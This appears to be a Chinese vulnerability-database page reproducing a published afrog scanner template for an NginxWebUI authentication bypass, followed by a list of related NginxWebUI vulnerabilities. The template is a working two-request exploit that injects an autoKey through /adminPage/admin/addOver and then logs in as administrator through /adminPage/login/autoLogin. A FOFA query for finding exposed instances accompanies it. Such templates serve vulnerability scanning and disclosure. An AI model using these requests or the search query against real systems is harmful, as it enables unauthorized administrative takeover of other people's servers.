nginxwebui-admin-bypass: NginxWebUI admin认证绕过（全版本通杀）

日期: 2025-09-01 | 影响软件: NginxWebUI | POC: 已公开

漏洞描述

Admin类型注入autoKey绕过认证、绕过密码和Google认证获取管理员权限 FOFA: app="nginxWebUI"

PoC代码[已公开]

id: nginxwebui-admin-bypass

info:
  name: NginxWebUI admin认证绕过（全版本通杀）
  author: zan8in
  severity: critical
  verified: true
  description: |-
    Admin类型注入autoKey绕过认证、绕过密码和Google认证获取管理员权限
    FOFA: app="nginxWebUI"
  reference:
    - https://mp.weixin.qq.com/s?__biz=MzU0MzkzOTYzOQ==&mid=2247488355&idx=1&sn=f18e4e4e83a9c7a16f2a8f4042f03c5a
  tags: nginxwebui,bypass
  created: 2023/11/28

rules:
  r0:
    request:
      method: POST
      path: /adminPage/admin/addOver
      body: |
        id=&name=test&api=false&type=0&autoKey=111111&parentId=
    expression: response.status == 200 && response.body.bcontains(b'"success":true') && response.body.bcontains(b'"status":200')
  r1:
    request:
      method: POST
      path: /adminPage/login/autoLogin?autoKey=111111
    expression: response.status == 200 && response.body.bcontains(b'"success":true') && response.body.bcontains(b'"status":200') && response.body.bcontains(b'"obj"') && response.body.bcontains(b'"autoKey":"111111"')
expression: r0() && r1()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/nginxwebui-admin-bypass.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

nginxWebUI cmdOver 远程命令执行漏洞 无POC

nginxwebui-rce: Nginx Web UI RCE POC

NginxWebUI /adminPage/main/upload 任意文件上传漏洞 无POC

nginxWebUI 远程代码执行漏洞 无POC

nginxWebUI getAuth 远程命令执行漏洞 无POC

nginxWebUI cmdOver 远程命令执行漏洞无POC

NginxWebUI /adminPage/main/upload 任意文件上传漏洞无POC

nginxWebUI 远程代码执行漏洞无POC

nginxWebUI getAuth 远程命令执行漏洞无POC